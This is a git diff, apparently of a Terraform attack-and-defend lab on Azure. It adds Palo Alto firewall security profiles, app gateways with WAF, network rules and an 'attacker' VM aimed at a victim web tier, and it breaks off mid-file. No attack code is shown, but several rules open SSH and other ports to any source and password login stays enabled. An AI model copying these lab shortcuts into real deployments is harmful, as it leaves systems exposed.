+                    <packet-capture>single-packet</packet-capture>
+                  </entry>
+                  <entry name="Internal-Alert">
+                    <action>
+                      <alert/>
+                    </action>
+                    <vendor-id>
+                      <member>Internal</member>
+                    </vendor-id>
+                    <severity>
+                      <member>informational</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>any</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="Alert">
+                    <action>
+                      <default/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>informational</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>any</host>
+                    <category>any</category>
+                    <packet-capture>extended-capture</packet-capture>
+                  </entry>
+                </rules>
+              </entry>
+            </vulnerability>
+            <wildfire-analysis>
+              <entry name="Outbound-WF">
+                <rules>
+                  <entry name="Forward-All">
+                    <application>
+                      <member>any</member>
+                    </application>
+                    <file-type>
+                      <member>any</member>
+                    </file-type>
+                    <direction>both</direction>
+                    <analysis>public-cloud</analysis>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Inbound-WF">
+                <rules>
+                  <entry name="Forward-All">
+                    <application>
+                      <member>any</member>
+                    </application>
+                    <file-type>
+                      <member>any</member>
+                    </file-type>
+                    <direction>both</direction>
+                    <analysis>public-cloud</analysis>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Internal-WF">
+                <rules>
+                  <entry name="Forward-All">
+                    <application>
+                      <member>any</member>
+                    </application>
+                    <file-type>
+                      <member>any</member>
+                    </file-type>
+                    <direction>both</direction>
+                    <analysis>public-cloud</analysis>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Alert-Only-WF">
+                <rules>
+                  <entry name="Forward-All">
+                    <application>
+                      <member>any</member>
+                    </application>
+                    <file-type>
+                      <member>any</member>
+                    </file-type>
+                    <direction>both</direction>
+                    <analysis>public-cloud</analysis>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Cloud-Recommended">
+                <rules>
+                  <entry name="Analyze-All">
+                    <application>
+                      <member>any</member>
+                    </application>
+                    <file-type>
+                      <member>any</member>
+                    </file-type>
+                    <direction>both</direction>
+                    <analysis>public-cloud</analysis>
+                  </entry>
+                </rules>
+              </entry>
+            </wildfire-analysis>
+          </profiles>
+          <profile-group>
+            <entry name="Outbound">
+              <virus>
+                <member>Outbound-AV</member>
+              </virus>
+              <spyware>
+                <member>Outbound-AS</member>
+              </spyware>
+              <vulnerability>
+                <member>Outbound-VP</member>
+              </vulnerability>
+              <url-filtering>
+                <member>Outbound-URL</member>
+              </url-filtering>
+              <file-blocking>
+                <member>Outbound-FB</member>
+              </file-blocking>
+              <wildfire-analysis>
+                <member>Outbound-WF</member>
+              </wildfire-analysis>
+            </entry>
+            <entry name="Inbound">
+              <virus>
+                <member>Inbound-AV</member>
+              </virus>
+              <spyware>
+                <member>Inbound-AS</member>
+              </spyware>
+              <vulnerability>
+                <member>Inbound-VP</member>
+              </vulnerability>
+              <file-blocking>
+                <member>Inbound-FB</member>
+              </file-blocking>
+              <wildfire-analysis>
+                <member>Inbound-WF</member>
+              </wildfire-analysis>
+            </entry>
+            <entry name="Internal">
+              <virus>
+                <member>Internal-AV</member>
+              </virus>
+              <spyware>
+                <member>Internal-AS</member>
+              </spyware>
+              <vulnerability>
+                <member>Internal-VP</member>
+              </vulnerability>
+              <file-blocking>
+                <member>Internal-FB</member>
+              </file-blocking>
+              <wildfire-analysis>
+                <member>Internal-WF</member>
+              </wildfire-analysis>
+            </entry>
+            <entry name="Alert-Only">
+              <virus>
+                <member>Alert-Only-AV</member>
+              </virus>
+              <spyware>
+                <member>Alert-Only-AS</member>
+              </spyware>
+              <vulnerability>
+                <member>Alert-Only-VP</member>
+              </vulnerability>
+              <url-filtering>
+                <member>Alert-Only-URL</member>
+              </url-filtering>
+              <file-blocking>
+                <member>Alert-Only-FB</member>
+              </file-blocking>
+              <wildfire-analysis>
+                <member>Alert-Only-WF</member>
+              </wildfire-analysis>
+            </entry>
+          </profile-group>
+          <import>
+            <network>
+              <interface/>
+              <virtual-router/>
+            </network>
+          </import>
+        </entry>
+      </vsys>
+    </entry>
+  </devices>
+</config>
diff --git a/azure/Jenkins_proj-working/WebInDeploy/bootstrap/init-cfg.txt b/azure/Jenkins_proj-working/WebInDeploy/bootstrap/init-cfg.txt
new file mode 100644
index 00000000..a8b71315
--- /dev/null
+++ b/azure/Jenkins_proj-working/WebInDeploy/bootstrap/init-cfg.txt
@@ -0,0 +1,2 @@
+dns-primary=8.8.8.8
+dns-secondary=8.8.4.4
\ No newline at end of file
diff --git a/azure/Jenkins_proj-working/WebInDeploy/firewall.tf b/azure/Jenkins_proj-working/WebInDeploy/firewall.tf
new file mode 100644
index 00000000..f5a09753
--- /dev/null
+++ b/azure/Jenkins_proj-working/WebInDeploy/firewall.tf
@@ -0,0 +1,50 @@
+#### CREATE THE FIREWALL ####
+
+resource "azurerm_virtual_machine" "firewall" {
+	name								= "firewall"
+	location						= "${data.azurerm_resource_group.resourcegroup.location}"
+	resource_group_name	= "${data.azurerm_resource_group.resourcegroup.name}"
+	network_interface_ids =
+	[
+		"${azurerm_network_interface.fwmanagement.id}",
+		"${azurerm_network_interface.fwuntrust.id}",
+		"${azurerm_network_interface.fwtrust.id}"
+	]
+
+	primary_network_interface_id		= "${azurerm_network_interface.fwmanagement.id}"
+	vm_size								= "Standard_D3_v2"
+
+  plan {
+    name = "bundle2"
+    publisher = "paloaltonetworks"
+    product = "vmseries1"
+  }
+
+	storage_image_reference	{
+		publisher 	= "paloaltonetworks"
+		offer		= "vmseries1"
+		sku			= "bundle2"
+		version		= "8.1.0"
+	}
+
+	storage_os_disk {
+		name			= "firewall-disk"
+		caching 		= "ReadWrite"
+		create_option	= "FromImage"
+    managed_disk_type = "Standard_LRS"
+	}
+
+	delete_os_disk_on_termination    = true
+	delete_data_disks_on_termination = true
+
+	os_profile 	{
+		computer_name	= "pa-vm"
+		admin_username	= "${var.Admin_Username}"
+		admin_password	= "${var.Admin_Password}"
+		custom_data = "storage-account=${var.Bootstrap_Storage_Account},access-key=${var.Storage_Account_Access_Key},file-share=${var.Storage_Account_Fileshare},share-directory=${var.Storage_Account_Fileshare_Directory}"
+	}
+
+	os_profile_linux_config {
+    disable_password_authentication = false
+  }
+}
\ No newline at end of file
diff --git a/azure/Jenkins_proj-working/WebInDeploy/interfaces.tf b/azure/Jenkins_proj-working/WebInDeploy/interfaces.tf
new file mode 100644
index 00000000..7669c85c
--- /dev/null
+++ b/azure/Jenkins_proj-working/WebInDeploy/interfaces.tf
@@ -0,0 +1,55 @@
+#### CREATE THE NETWORK INTERFACES ####
+
+resource "azurerm_network_interface" "fwmanagement" {
+	name								= "fwmanagement"
+	location							= "${data.azurerm_resource_group.resourcegroup.location}"
+	resource_group_name 				= "${data.azurerm_resource_group.resourcegroup.name}"
+	ip_configuration {
+		name							= "fweth0"
+		subnet_id						= "${azurerm_subnet.management.id}"
+		private_ip_address_allocation 	= "Static"
+    private_ip_address = "${var.FW_Mgmt_IP}"
+		public_ip_address_id = "${azurerm_public_ip.fwmanagement.id}"
+	}
+	depends_on = ["azurerm_public_ip.fwmanagement"]
+}
+
+resource "azurerm_network_interface" "fwuntrust" {
+	name								= "fwuntrust"
+	location							= "${data.azurerm_resource_group.resourcegroup.location}"
+	resource_group_name 				= "${data.azurerm_resource_group.resourcegroup.name}"
+	enable_ip_forwarding				= "true"
+	ip_configuration {
+		name							= "fweth1"
+		subnet_id						= "${azurerm_subnet.untrust.id}"
+		private_ip_address_allocation 	= "Static"
+    private_ip_address = "${var.FW_Untrust_IP}"
+	}
+}
+
+resource "azurerm_network_interface" "fwtrust" {
+	name								= "fwtrust"
+	location							= "${data.azurerm_resource_group.resourcegroup.location}"
+	resource_group_name 				= "${data.azurerm_resource_group.resourcegroup.name}"
+	enable_ip_forwarding				= "true"
+	ip_configuration {
+		name							= "fweth2"
+		subnet_id						= "${azurerm_subnet.trust.id}"
+		private_ip_address_allocation 	= "Static"
+    private_ip_address = "${var.FW_Trust_IP}"
+	}
+}
+
+#### WEB SERVER INTERFACES FOR APP1 ####
+
+resource "azurerm_network_interface" "web1" {
+  name                = "web1eth0"
+  location            = "${data.azurerm_resource_group.resourcegroup.location}"
+  resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}"
+  ip_configuration {
+    name                          = "web1eth0"
+    subnet_id                     = "${azurerm_subnet.webservers.id}"
+    private_ip_address_allocation = "Static"
+    private_ip_address = "${var.Web_IP}"
+  }
+}
\ No newline at end of file
diff --git a/azure/Jenkins_proj-working/WebInDeploy/kali-interfaces.tf b/azure/Jenkins_proj-working/WebInDeploy/kali-interfaces.tf
new file mode 100644
index 00000000..3dc66140
--- /dev/null
+++ b/azure/Jenkins_proj-working/WebInDeploy/kali-interfaces.tf
@@ -0,0 +1,15 @@
+#### CREATE THE NETWORK INTERFACES ####
+
+resource "azurerm_network_interface" "attacker" {
+	name								= "attacker"
+	location							= "${azurerm_resource_group.attackgroup.location}"
+	resource_group_name 				= "${azurerm_resource_group.attackgroup.name}"
+	ip_configuration {
+		name							= "eth0"
+		subnet_id						= "${azurerm_subnet.attacker.id}"
+		private_ip_address_allocation 	= "Static"
+    private_ip_address = "${var.Attack_IP}"
+		public_ip_address_id = "${azurerm_public_ip.attacker.id}"
+	}
+	depends_on = ["azurerm_public_ip.attacker"]
+}
\ No newline at end of file
diff --git a/azure/Jenkins_proj-working/WebInDeploy/kali-nsg.tf b/azure/Jenkins_proj-working/WebInDeploy/kali-nsg.tf
new file mode 100644
index 00000000..539e88a6
--- /dev/null
+++ b/azure/Jenkins_proj-working/WebInDeploy/kali-nsg.tf
@@ -0,0 +1,45 @@
+resource "azurerm_network_security_group" "Attack_NSG" {
+  name                = "Attack_NSG"
+	location			      = "${azurerm_resource_group.attackgroup.location}"
+	resource_group_name	= "${azurerm_resource_group.attackgroup.name}"
+
+  security_rule {
+    name                       = "Allow-FW-22"
+    priority                   = 100
+    direction                  = "Inbound"
+    access                     = "Allow"
+    protocol                   = "*"
+    source_port_range          = "*"
+    destination_port_range     = "22"
+    source_address_prefix      = "*"
+    destination_address_prefix = "${var.Attack_IP}"
+  }
+
+  security_rule {
+    name                       = "Allow-FW-443"
+    priority                   = 101
+    direction                  = "Inbound"
+    access                     = "Allow"
+    protocol                   = "*"
+    source_port_range          = "*"
+    destination_port_range     = "443"
+    source_address_prefix      = "*"
+    destination_address_prefix = "${var.Attack_IP}"
+  }
+
+  security_rule {
+    name                       = "Allow-FW-5000"
+    priority                   = 102
+    direction                  = "Inbound"
+    access                     = "Allow"
+    protocol                   = "*"
+    source_port_range          = "*"
+    destination_port_range     = "5000"
+    source_address_prefix      = "*"
+    destination_address_prefix = "${var.Attack_IP}"
+  }
+}
+resource "azurerm_subnet_network_security_group_association" "attackgroup" {
+  subnet_id                 = "${azurerm_subnet.attacker.id}"
+  network_security_group_id = "${azurerm_network_security_group.Attack_NSG.id}"
+}
\ No newline at end of file
diff --git a/azure/Jenkins_proj-working/WebInDeploy/kali-public-ips.tf b/azure/Jenkins_proj-working/WebInDeploy/kali-public-ips.tf
new file mode 100644
index 00000000..c56b2d23
--- /dev/null
+++ b/azure/Jenkins_proj-working/WebInDeploy/kali-public-ips.tf
@@ -0,0 +1,8 @@
+#### CREATE PUBLIC IP ADDRESSES ####
+
+resource "azurerm_public_ip" attacker {
+	name                = "attacker"
+	location			      = "${azurerm_resource_group.attackgroup.location}"
+	resource_group_name	= "${azurerm_resource_group.attackgroup.name}"
+	allocation_method   = "Static"
+}
\ No newline at end of file
diff --git a/azure/Jenkins_proj-working/WebInDeploy/kali-rg-subnets.tf b/azure/Jenkins_proj-working/WebInDeploy/kali-rg-subnets.tf
new file mode 100644
index 00000000..6ca1e8a0
--- /dev/null
+++ b/azure/Jenkins_proj-working/WebInDeploy/kali-rg-subnets.tf
@@ -0,0 +1,29 @@
+# ********** RESOURCE GROUP **********
+
+# Create a resource group
+resource "random_id" "attack_resource_group" {
+  byte_length = 2
+}
+resource "azurerm_resource_group" "attackgroup" {
+	name		= "${var.Attack_RG_Name}-${lower(random_id.attack_resource_group.hex)}"
+	location	= "${var.Azure_Region}"
+}
+
+# ********** VNET **********
+
+# Create a virtual network in the resource group
+resource "azurerm_virtual_network" "attack-vnet" {
+	name				= "attack-vnet"
+	address_space		= ["${var.Attack_CIDR}"]
+	location			= "${azurerm_resource_group.attackgroup.location}"
+	resource_group_name	= "${azurerm_resource_group.attackgroup.name}"
+}
+
+#### CREATE THE SUBNETS ####
+
+resource "azurerm_subnet" "attacker" {
+  name                 = "attacker"
+  resource_group_name  = "${azurerm_resource_group.attackgroup.name}"
+  virtual_network_name = "${azurerm_virtual_network.attack-vnet.name}"
+  address_prefix       = "${var.Attack_Subnet_CIDR}"
+}
\ No newline at end of file
diff --git a/azure/Jenkins_proj-working/WebInDeploy/kali-route-tables.tf b/azure/Jenkins_proj-working/WebInDeploy/kali-route-tables.tf
new file mode 100644
index 00000000..c393ebf7
--- /dev/null
+++ b/azure/Jenkins_proj-working/WebInDeploy/kali-route-tables.tf
@@ -0,0 +1,16 @@
+#### CREATE THE ROUTE TABLES ####
+
+resource "azurerm_route_table" "attacker" {
+  name                = "attacker"
+	location			      = "${azurerm_resource_group.attackgroup.location}"
+	resource_group_name	= "${azurerm_resource_group.attackgroup.name}"
+  route {
+    name           = "internet"
+    address_prefix = "0.0.0.0/0"
+    next_hop_type  = "internet"
+  }
+}
+resource "azurerm_subnet_route_table_association" "attacker" {
+  subnet_id      = "${azurerm_subnet.attacker.id}"
+  route_table_id = "${azurerm_route_table.attacker.id}"
+}
\ No newline at end of file
diff --git a/azure/Jenkins_proj-working/WebInDeploy/kali-server.tf b/azure/Jenkins_proj-working/WebInDeploy/kali-server.tf
new file mode 100644
index 00000000..c6c9cef0
--- /dev/null
+++ b/azure/Jenkins_proj-working/WebInDeploy/kali-server.tf
@@ -0,0 +1,46 @@
+data "template_file" "attacker" {
+  
+  template = "${file("${path.root}${var.Attack_Initscript_Path}")}"
+}
+data "template_cloudinit_config" "attacker" {
+  gzip          = true
+  base64_encode = true
+
+  part {
+    content = "${data.template_file.attacker.rendered}"
+  }
+}
+
+resource "azurerm_virtual_machine" "attacker" {
+  name                  = "attacker"
+	location			        = "${azurerm_resource_group.attackgroup.location}"
+	resource_group_name	  = "${azurerm_resource_group.attackgroup.name}"
+  vm_size               = "Standard_A3"
+
+  storage_image_reference {
+    publisher = "Canonical"
+    offer     = "UbuntuServer"
+    sku       = "16.04-LTS"
+    version   = "latest"
+  }
+
+  storage_os_disk {
+    name              = "attacker-disk"
+    caching           = "ReadWrite"
+    create_option     = "FromImage"
+    managed_disk_type = "Standard_LRS"
+  }
+
+  os_profile {
+    computer_name  = "attacker"
+    admin_username = "${var.Admin_Username}"
+    admin_password = "${var.Admin_Password}"
+    custom_data    = "${data.template_cloudinit_config.attacker.rendered}"
+  }
+
+  network_interface_ids = ["${azurerm_network_interface.attacker.id}"]
+
+  os_profile_linux_config {
+    disable_password_authentication = false
+  }
+}
\ No newline at end of file
diff --git a/azure/Jenkins_proj-working/WebInDeploy/loadbalancers.tf b/azure/Jenkins_proj-working/WebInDeploy/loadbalancers.tf
new file mode 100644
index 00000000..14f0338f
--- /dev/null
+++ b/azure/Jenkins_proj-working/WebInDeploy/loadbalancers.tf
@@ -0,0 +1,155 @@
+#### CREATE THE LOAD BALANCERS ####
+
+#### AppGW1 ####
+
+resource "azurerm_application_gateway" "appgw1" {
+  name                = "appgw1"
+  location            = "${data.azurerm_resource_group.resourcegroup.location}"
+  resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}"
+  sku {
+    name = "WAF_Medium"
+    tier = "WAF"
+    capacity = 2
+  }
+  waf_configuration {
+    enabled = "true"
+    firewall_mode = "Prevention"
+    rule_set_type = "OWASP"
+    rule_set_version = "3.0"
+  }
+  gateway_ip_configuration {
+    name = "loadbalancers"
+    subnet_id = "${azurerm_subnet.loadbalancers.id}"
+  }
+  frontend_port {
+    name = "http"
+    port = 80
+  }
+  frontend_ip_configuration {
+    name                 = "lbpublicipaddress1"
+    public_ip_address_id = "${azurerm_public_ip.appgw1.id}"
+  }
+  backend_address_pool {
+    name = "webservers"
+    ip_addresses = ["${var.Web_IP}"]
+  }
+  http_listener {
+    name                           = "http"
+    frontend_ip_configuration_name = "lbpublicipaddress1"
+    frontend_port_name             = "http"
+    protocol                       = "Http"
+  }
+  backend_http_settings {
+    name                  = "http"
+    cookie_based_affinity = "Disabled"
+    port                  = 8080
+    protocol              = "Http"
+    request_timeout       = 1
+  }
+  request_routing_rule {
+    name                       = "http"
+    rule_type                  = "Basic"
+    http_listener_name         = "http"
+    backend_address_pool_name  = "webservers"
+    backend_http_settings_name = "http"
+  }
+  depends_on = ["data.azurerm_resource_group.resourcegroup"]
+}
+
+#### AppGW2 ####
+
+resource "azurerm_application_gateway" "appgw2" {
+  name                = "appgw2"
+  location            = "${data.azurerm_resource_group.resourcegroup.location}"
+  resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}"
+  sku {
+    name = "WAF_Medium"
+    tier = "WAF"
+    capacity = 2
+  }
+  waf_configuration {
+    enabled = "true"
+    firewall_mode = "Prevention"
+    rule_set_type = "OWASP"
+    rule_set_version = "3.0"
+  }
+  gateway_ip_configuration {
+    name = "loadbalancers"
+    subnet_id = "${azurerm_subnet.loadbalancers.id}"
+  }
+  frontend_port {
+    name = "http"
+    port = 80
+  }
+  frontend_ip_configuration {
+    name                 = "lbpublicipaddress2"
+    public_ip_address_id = "${azurerm_public_ip.appgw2.id}"
+  }
+  backend_address_pool {
+    name = "firewalls"
+    ip_addresses = ["${var.FW_Untrust_IP}"]
+  }
+  http_listener {
+    name                           = "http"
+    frontend_ip_configuration_name = "lbpublicipaddress2"
+    frontend_port_name             = "http"
+    protocol                       = "Http"
+  }
+  backend_http_settings {
+    name                  = "http"
+    cookie_based_affinity = "Disabled"
+    port                  = 80
+    protocol              = "Http"
+    request_timeout       = 1
+  }
+  request_routing_rule {
+    name                       = "http"
+    rule_type                  = "Basic"
+    http_listener_name         = "http"
+    backend_address_pool_name  = "firewalls"
+    backend_http_settings_name = "http"
+  }
+  depends_on = ["data.azurerm_resource_group.resourcegroup"]
+}
+
+#### INTERNAL APP FACING LOAD BALANCER ####
+
+resource "azurerm_lb" "weblb" {
+  name                = "weblb"
+  location            = "${data.azurerm_resource_group.resourcegroup.location}"
+  resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}"
+  frontend_ip_configuration {
+    name                          = "weblbip"
+		subnet_id                     = "${azurerm_subnet.webservers.id}"
+    private_ip_address_allocation = "Static"
+    private_ip_address = "${var.WebLB_IP}"
+  }
+}
+resource "azurerm_lb_backend_address_pool" "webservers" {
+  resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}"
+  loadbalancer_id     = "${azurerm_lb.weblb.id}"
+  name                = "webservers"
+}
+resource "azurerm_network_interface_backend_address_pool_association" "webservers" {
+  network_interface_id    = "${azurerm_network_interface.web1.id}"
+  ip_configuration_name   = "web1eth0"
+  backend_address_pool_id = "${azurerm_lb_backend_address_pool.webservers.id}"
+}
+resource "azurerm_lb_probe" "webservers" {
+  resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}"
+  loadbalancer_id     = "${azurerm_lb.weblb.id}"
+  name                = "http-running-probe"
+  port                = 8080
+}
+
+resource "azurerm_lb_rule" "webservers" {
+  resource_group_name            = "${data.azurerm_resource_group.resourcegroup.name}"
+  loadbalancer_id                = "${azurerm_lb.weblb.id}"
+  name                           = "WebRule"
+  protocol                       = "Tcp"
+  frontend_port                  = 8080
+  backend_port                   = 8080
+  frontend_ip_configuration_name = "weblbip"
+  backend_address_pool_id        = "${azurerm_lb_backend_address_pool.webservers.id}"
+  probe_id                       = "${azurerm_lb_probe.webservers.id}"
+}
diff --git a/azure/Jenkins_proj-working/WebInDeploy/nsg.tf b/azure/Jenkins_proj-working/WebInDeploy/nsg.tf
new file mode 100644
index 00000000..fd8452a8
--- /dev/null
+++ b/azure/Jenkins_proj-working/WebInDeploy/nsg.tf
@@ -0,0 +1,84 @@
+resource "azurerm_network_security_group" "PAN_FW_NSG" {
+  name                = "DefaultNSG"
+  resource_group_name      = "${data.azurerm_resource_group.resourcegroup.name}"
+  location                 = "${data.azurerm_resource_group.resourcegroup.location}"
+
+  security_rule {
+    name                       = "Allow-22"
+    priority                   = 100
+    direction                  = "Inbound"
+    access                     = "Allow"
+    protocol                   = "*"
+    source_port_range          = "*"
+    destination_port_range     = "22"
+    source_address_prefix      = "*"
+    destination_address_prefix = "${var.FW_Mgmt_IP}"
+  }
+  security_rule {
+    name                       = "Allow-443"
+    priority                   = 101
+    direction                  = "Inbound"
+    access                     = "Allow"
+    protocol                   = "*"
+    source_port_range          = "*"
+    destination_port_range     = "443"
+    source_address_prefix      = "*"
+    destination_address_prefix = "${var.FW_Mgmt_IP}"
+  }
+  
+  security_rule {
+    name                       = "Allow-80-LB"
+    priority                   = 102
+    direction                  = "Inbound"
+    access                     = "Allow"
+    protocol                   = "*"
+    source_port_range          = "*"
+    destination_port_range     = "80"
+    source_address_prefix      = "*"
+    destination_address_prefix = "*"
+  }
+  
+  security_rule {
+    name                       = "Allow-Intra-80"
+    priority                   = 103
+    direction                  = "Inbound"
+    access                     = "Allow"
+    protocol                   = "*"
+    source_port_range          = "*"
+    destination_port_range     = "80"
+    source_address_prefix      = "${var.Victim_CIDR}"
+    destination_address_prefix = "*"
+  }
+
+  security_rule {
+    name                       = "Allow-Intra-8080"
+    priority                   = 104
+    direction                  = "Inbound"
+    access                     = "Allow"
+    protocol                   = "*"
+    source_port_range          = "*"
+    destination_port_range     = "8080"
+    source_address_prefix      = "${var.Victim_CIDR}"
+    destination_address_prefix = "*"
+  }
+}
+resource "azurerm_subnet_network_security_group_association" "management" {
+  subnet_id                 = "${azurerm_subnet.management.id}"
+  network_security_group_id = "${azurerm_network_security_group.PAN_FW_NSG.id}"
+}
+resource "azurerm_subnet_network_security_group_association" "untrust" {
+  subnet_id                 = "${azurerm_subnet.untrust.id}"
+  network_security_group_id = "${azurerm_network_security_group.PAN_FW_NSG.id}"
+}
+resource "azurerm_subnet_network_security_group_association" "trust" {
+  subnet_id                 = "${azurerm_subnet.trust.id}"
+  network_security_group_id = "${azurerm_network_security_group.PAN_FW_NSG.id}"
+}
+resource "azurerm_subnet_network_security_group_association" "loadbalancers" {
+  subnet_id                 = "${azurerm_subnet.loadbalancers.id}"
+  network_security_group_id = "${azurerm_network_security_group.PAN_FW_NSG.id}"
+}
+resource "azurerm_subnet_network_security_group_association" "webservers" {
+  subnet_id                 = "${azurerm_subnet.webservers.id}"
+  network_security_group_id = "${azurerm_network_security_group.PAN_FW_NSG.id}"
+}
\ No newline at end of file
diff --git a/azure/Jenkins_proj-working/WebInDeploy/outputs.bak b/azure/Jenkins_proj-working/WebInDeploy/outputs.bak
new file mode 100644
index 00000000..3e50e79d
--- /dev/null
+++ b/azure/Jenkins_proj-working/WebInDeploy/outputs.bak
@@ -0,0 +1,19 @@
+output "MGT-IP-FW-1" {
+  value = "${azurerm_public_ip.fwmanagement.ip_address}"
+}
+
+output "NLB-DNS" {
+  value = "${aws_lb.int-nlb.dns_name}"
+}
+
+output "ALB-DNS" {
+  value = "${aws_lb.panos-alb.dns_name}"
+}
+
+output "NATIVE-DNS" {
+  value = "${aws_lb.native-alb.dns_name}"
+}
+
+output "ATTACKER_IP" {
+  value = "${azurerm_public_ip.attacker.ip_address}"
+}
diff --git a/azure/Jenkins_proj-working/WebInDeploy/outputs.tf b/azure/Jenkins_proj-working/WebInDeploy/outputs.tf
new file mode 100644
index 00000000..81a006ad
--- /dev/null
+++ b/azure/Jenkins_proj-working/WebInDeploy/outputs.tf
@@ -0,0 +1,27 @@
+output "MGT-IP-FW-1" {
+  value = "${azurerm_public_ip.fwmanagement.ip_address}"
+}
+
+output "NLB-DNS" {
+  value = "${var.WebLB_IP}"
+}
+
+output "ALB-DNS" {
+  value = "${azurerm_public_ip.appgw2.fqdn}"
+}
+
+output "NATIVE-DNS" {
+  value = "${azurerm_public_ip.appgw1.fqdn}"
+}
+
+output "ATTACKER_IP" {
+  value = "${azurerm_public_ip.attacker.ip_address}"
+}
+
+output "RG_Name" {
+  value = "${data.azurerm_resource_group.resourcegroup.name}"
+}
+
+output "Attacker_RG_Name" {
+  value = "${azurerm_resource_group.attackgroup.name}"
+}
diff --git a/azure/Jenkins_proj-working/WebInDeploy/public-ips.tf b/azure/Jenkins_proj-working/WebInDeploy/public-ips.tf
new file mode 100644
index 00000000..2db98644
--- /dev/null
+++ b/azure/Jenkins_proj-working/WebInDeploy/public-ips.tf
@@ -0,0 +1,26 @@
+#### CREATE PUBLIC IP ADDRESSES ####
+resource "random_id" "public_ip" {
+  byte_length = 2
+}
+resource "azurerm_public_ip" fwmanagement {
+	name                = "fwmanagement"
+	location						= "${data.azurerm_resource_group.resourcegroup.location}"
+	resource_group_name	= "${data.azurerm_resource_group.resourcegroup.name}"
+	allocation_method   = "Static"
+}
+
+resource "azurerm_public_ip" "appgw1" {
+  name                = "appgw1"
+  location            = "${data.azurerm_resource_group.resourcegroup.location}"
+  resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}"
+  domain_name_label   = "sans-ngfw-${lower(random_id.public_ip.hex)}"
+  allocation_method   = "Dynamic"
+}
+
+resource "azurerm_public_ip" "appgw2" {
+  name                = "appgw2"
+  location            = "${data.azurerm_resource_group.resourcegroup.location}"
+  resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}"
+  domain_name_label   = "with-ngfw-${lower(random_id.public_ip.hex)}"
+  allocation_method   = "Dynamic"
+}
\ No newline at end of file
diff --git a/azure/Jenkins_proj-working/WebInDeploy/rg-subnets.tf b/azure/Jenkins_proj-working/WebInDeploy/rg-subnets.tf
new file mode 100644
index 00000000..efc3be8f
--- /dev/null
+++ b/azure/Jenkins_proj-working/WebInDeploy/rg-subnets.tf
@@ -0,0 +1,54 @@
+//# ********** RESOURCE GROUP **********
+//
+//# Create a resource group
+resource "azurerm_resource_group" "resourcegroup" {
+	name		= "${var.RG_Name}"
+	location	= "${var.Azure_Region}"
+}
+
+//# ********** VNET **********
+//
+//# Create a virtual network in the resource group
+//resource "azurerm_virtual_network" "vnet" {
+//	name				= "vnet-fw"
+//	address_space		= ["${var.VNetCIDR}"]
+//	location			= "${azurerm_resource_group.resourcegroup.location}"
+//	resource_group_name	= "${azurerm_resource_group.resourcegroup.name}"
+//}
+//
+//#### CREATE THE SUBNETS ####
+//
+//resource "azurerm_subnet" "management" {
+//  name                 = "management"
+//  resource_group_name  = "${azurerm_resource_group.resourcegroup.name}"
+//  virtual_network_name = "${azurerm_virtual_network.vnet.name}"
+//  address_prefix       = "${var.WebCIDR_MGMT}"
+//}
+//
+//resource "azurerm_subnet" "untrust" {
+//  name                 = "untrust"
+//  resource_group_name  = "${azurerm_resource_group.resourcegroup.name}"
+//  virtual_network_name = "${azurerm_virtual_network.vnet.name}"
+//  address_prefix       = "${var.WebCIDR_UntrustBlock}"
+//}
+//
+//resource "azurerm_subnet" "trust" {
+//  name                 = "trust"
+//  resource_group_name  = "${azurerm_resource_group.resourcegroup.name}"
+//  virtual_network_name = "${azurerm_virtual_network.vnet.name}"
+//  address_prefix       = "${var.WebCIDR_TrustBlock}"
+//}
+//
+//resource "azurerm_subnet" "loadbalancers" {
+//  name                 = "loadbalancers"
+//  resource_group_name  = "${azurerm_resource_group.resourcegroup.name}"
+//  virtual_network_name = "${azurerm_virtual_network.vnet.name}"
+//  address_prefix       = "${var.WebCIDR_AppGWBlock}"
+//}
+//
+//resource "azurerm_subnet" "webservers" {
+//  name                 = "webservers"
+//  resource_group_name  = "${azurerm_resource_group.resourcegroup.name}"
+//  virtual_network_name = "${azurerm_virtual_network.vnet.name}"
+//  address_prefix       = "${var.WebCIDR_WebBlock}"
+//}
\ No newline at end of file
diff --git a/azure/Jenkins_proj-working/WebInDeploy/route-tables.tf b/azure/Jenkins_proj-working/WebInDeploy/route-tables.tf
new file mode 100644
index 00000000..7b286b57
--- /dev/null
+++ b/azure/Jenkins_proj-working/WebInDeploy/route-tables.tf
@@ -0,0 +1,48 @@
+#### CREATE THE ROUTE TABLES ####
+
+resource "azurerm_route_table" "management" {
+  name                = "management"
+  location            = "${data.azurerm_resource_group.resourcegroup.location}"
+  resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}"
+  route {
+    name           = "internet"
+    address_prefix = "0.0.0.0/0"
+    next_hop_type  = "internet"
+  }
+}
+resource "azurerm_route_table" "untrust" {
+  name                = "untrust"
+  location            = "${data.azurerm_resource_group.resourcegroup.location}"
+  resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}"
+  route {
+    name           = "internet"
+    address_prefix = "0.0.0.0/0"
+    next_hop_type  = "internet"
+  }
+}
+
+resource "azurerm_route_table" "webservers" {
+  name                = "webservers"
+  location            = "${data.azurerm_resource_group.resourcegroup.location}"
+  resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}"
+  route {
+    name           = "internet"
+    address_prefix = "0.0.0.0/0"
+    next_hop_type  = "internet"
+  }
+}
+
+resource "azurerm_subnet_route_table_association" "management" {
+  subnet_id      = "${azurerm_subnet.management.id}"
+  route_table_id = "${azurerm_route_table.management.id}"
+}
+
+resource "azurerm_subnet_route_table_association" "untrust" {
+  subnet_id      = "${azurerm_subnet.untrust.id}"
+  route_table_id = "${azurerm_route_table.untrust.id}"
+}
+
+resource "azurerm_subnet_route_table_association" "webservers" {
